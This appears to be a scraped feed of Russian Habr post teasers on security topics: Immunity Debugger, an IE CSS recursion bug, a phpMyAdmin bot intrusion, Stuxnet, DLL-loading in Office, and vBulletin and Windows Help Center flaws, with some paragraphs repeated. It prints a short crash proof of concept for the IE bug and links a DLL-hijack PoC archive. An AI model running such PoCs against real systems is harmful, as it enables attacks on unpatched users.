Python → Gray Hat Python — Immunity Debugger
Intro
Рассмотрев создание и использования отладчика на чистом Python’е в виде PyDbg, пришло время изучить Immunity Debugger, который состоит из полноценного пользовательского интерфейса и наимощнейшей Python-библиотекой, на сегодняшний день, для разработки эксплойтов, обнаружения уязвимостей и анализа вредоносного кода. Выпущенный в 2007 году, Immunity Debugger имеет хорошее сочетание возможностей как динамической отладки, так и статического анализа. Помимо этого он имеет полностью настраиваемый графический интерфейс, реализованный на чистом Питоне. В начале этой главы мы кратко познакомимся с отладчиком Immunity Debugger и его пользовательским интерфейсом. Затем начнем постепенное углубление в разработку эксплойта и некоторых методов, для автоматического обхода анти-отладочных приемов, применяемых в вредоносном ПО. Давайте начнем с загрузки Immunity Debugger и его запуска.
Apple → Подкаст AppleInsider.ru [34]
Здравствуйте, читатели Хабрахабр!
В этом выпуске мы решили провести небольшой эксперимент, и пригласить в качестве со-ведущих – наших слушателей. Напишите в комментариях – как вы относитесь к такой инициативе, если она будет проходить периодически. Нам бы хотелось сделать этот подкаст как можно лучше, и мы рассчитываем на вашу помощь!
Спасибо.
Подписка: iTunes | RSS | MP3
AppleInsider.ru: Тридцать четвертый выпуск.
В этом выпуске мы решили провести небольшой эксперимент, и пригласить в качестве со-ведущих – наших слушателей. Напишите в комментариях – как вы относитесь к такой инициативе, если она будет проходить периодически. Нам бы хотелось сделать этот подкаст как можно лучше, и мы рассчитываем на вашу помощь!
Спасибо.
- Apple меняет дизайн LED-подсветки для будущего iPad 3 с экраном Retina Display
- Инсайдерская информация о работе в салоне Евросеть
- Что будет с Research in Motion?
- Apple выпустила iOS 5.0.1 beta 2
- Эксплойт в iOS 5
- Скрытая функция «Панорама» в iOS 5
- Вся правда о том, где Siri распознает голос
- Ужасы пользователя Mac: Winamp
- Бантик
Подписка: iTunes | RSS | MP3
прослушан 527 раз
Информационная безопасность → Ошибка в рекурсивной обработке CSS в IE 6/7/8 (CVE-2010-3971)
Не так давно, а точнее в начале декабря была раскрыта информация о найденной ошибке в рекурсивной обработке CSS в различных версиях IE. Представленный PoC мог только ронять браузер, но выжить из него чего то более осмысленное не могли до начала этой недели, пока в Metasploit не появился эксплойт с полноценной эксплуатацией этой уязвимости.
Первоначально PoC выглядел так:
Первоначально PoC выглядел так:
<code>
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css.css" rel="stylesheet" type="text/css" />
</code>
<code of css.css>
*{
color:red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
</code>Вопросы безопасности в веб-технологиях → Анализ проникновения бота через эксплоит в старых версиях phpmyadmin и рекомендации по настройкам безопасности php-хостинга
Имею на администрировании несколько серверов, на которых хостятся восновном свои проекты, но кроме них ещё довольно много пришлось разместить левых сайтов — клиентов, знакомых, знакомых знакомых и т.п. За время администрирования встречались разные проблемы, поэтому настроены кое-какие мониторинги (zabbix и самописные скрипты).
И вот вчера на одном из серверов скрипт, проверяющий активные соединения, забил тревогу: постоянно висит исходящее соединение на неизвестный хост на порт 433, уже более 9 часов на момент когда я осилил прочитать почту в понедельник утром ;)
При беглом просмотре кроме этого активного соединения больше никаких аномалий и левых процессов в системе не было обнаружено, резкого роста трафика на интерфейсе тоже не обнаружено, но это меня не успокоило, поэтому пришлось выяснять подробнее.
По результатам анализа я выяснил что подобная дыра в безопасности может быть на большинстве серверов с базовыми настройками PHP, поэтому решил сделать пост на хабре чтобы обезопасить остальных владельцев серверов с хостингом от подобных случаев, а также описал способы поиска источников попадания заразы на сервер.
И вот вчера на одном из серверов скрипт, проверяющий активные соединения, забил тревогу: постоянно висит исходящее соединение на неизвестный хост на порт 433, уже более 9 часов на момент когда я осилил прочитать почту в понедельник утром ;)
При беглом просмотре кроме этого активного соединения больше никаких аномалий и левых процессов в системе не было обнаружено, резкого роста трафика на интерфейсе тоже не обнаружено, но это меня не успокоило, поэтому пришлось выяснять подробнее.
По результатам анализа я выяснил что подобная дыра в безопасности может быть на большинстве серверов с базовыми настройками PHP, поэтому решил сделать пост на хабре чтобы обезопасить остальных владельцев серверов с хостингом от подобных случаев, а также описал способы поиска источников попадания заразы на сервер.
Блог компании ESET NOD32 → Stuxnet. Истерия продолжается…
Уже много раз обсуждалась тема червя Stuxnet на Хабре. Казалось бы, осветили данное событие со всех сторон, однако все же много важных моментов осталось за кадром. Дело в том, что за всем этим «желтоватым» информационным шумом, фигурирующем сейчас в СМИ, не видно сути. А ведь до сих пор никто не может ответить точно на вопрос, зачем и кому могла быть выгодна такая атака. Прямых фактов не у кого нет, а фигурируют лишь домыслы, сделанные на довольно шатком фундаменте косвенных улик. Но давайте поговорим обо всем по порядку.
На конференции VB’2010, которая прошла в Ванкувере на прошлой неделе, очень много говорили об этой атаке, причем с разных ракурсов. Наиболее интересным по данной теме было выступление «An indepth look into Stuxnet» от исследователя из Symantec, Liam O'Murchu. В рамках его доклада была проведена любопытная демонстрация, которая показывала результат эксплуатации SCADA-системы.
На конференции VB’2010, которая прошла в Ванкувере на прошлой неделе, очень много говорили об этой атаке, причем с разных ракурсов. Наиболее интересным по данной теме было выступление «An indepth look into Stuxnet» от исследователя из Symantec, Liam O'Murchu. В рамках его доклада была проведена любопытная демонстрация, которая показывала результат эксплуатации SCADA-системы.
Информационная безопасность → MakeMeLaughNow — анализ червя нового поколения в Facebook (перевод)
В недавнем топике высказали пожелание, что было бы хорошо, если бы кто-то перевел. Я посмотрел текст — вроде не так много. Поэтому, кому интересно, смотрим…
Microsoft → Уязвимость в загрузке DLL есть в Microsoft Office — PoC
В недавнем топике описывалась уязвимость в механизме загрузки DLL. Проблема в том, что библиотека может быть загружена из текущего каталога (а текущим каталогом может быть любой каталог, где лежит документ, например «Мои документы»). Это позволяет прислать жертве архив с документом и DLL. Пользователь откроет документ, а приложение в добавок ко всему загрузит и выполнит DLL.
В комментариях к топику многие отписались, что они так и не смогли добиться нужного эффекта. Для всех неосиливших выкладываю готовый ZIP архив с двумя файлами, чтобы все могли убедиться самостоятельно. DLL'ка запускает калькулятор. У меня работает на полностью пропатченой Windows XP SP3 и Microsoft Office 2007.
Архив powerpoint-poc.zip: depositfiles.com/files/tosmktxwp
В комментариях к топику многие отписались, что они так и не смогли добиться нужного эффекта. Для всех неосиливших выкладываю готовый ZIP архив с двумя файлами, чтобы все могли убедиться самостоятельно. DLL'ка запускает калькулятор. У меня работает на полностью пропатченой Windows XP SP3 и Microsoft Office 2007.
Архив powerpoint-poc.zip: depositfiles.com/files/tosmktxwp
Информационная безопасность → Для phpMyAdmin появился эксплоит
Зашел только что в свой почтовый ящик и увидел письмо от своего провайдера где арендую VPS, что в для phpmyadmin появился эксплоит. Вот само письмо:
Информационная безопасность → В vBulletin обнаружена серьёзная уязвимость
В популярном движке для форумов vBulletin нашли интересную уязвимость — при вводе в поиске на странице FAQ слова «database» на экран выводится вся информация о подключения к MySQL серверу.
Проблему устранили в vBulletin версии 3.8.6-PL1.
Если верить разработчикам — данный баг был просто недосмотром, из движка забыли убрать часть дебаг-кода.
Информационная безопасность → Уязвимость Windows Help and Support Center (CVE-2010-1885) в цифрах
Предыстория такова, что 10 июня небезызвестный гуглоинженер Tavis Ormandy aka taviso, обнародовал уязвимость в механизме проверки обращений (hcp://) к Microsoft Windows Help Centre. Собственно он не просто обнародовал уязвимость, но и открыл исходный код эксплойта. MS жаловалась на этого товарища, что он мало им дал времени для закрытия уязвимости и вообще зря затеял выкладывать такое на паблик, но обсуждать здесь сторону морали мне совсем не хочется. Чуть позднее эксплойт появился в репозитории Metasploit.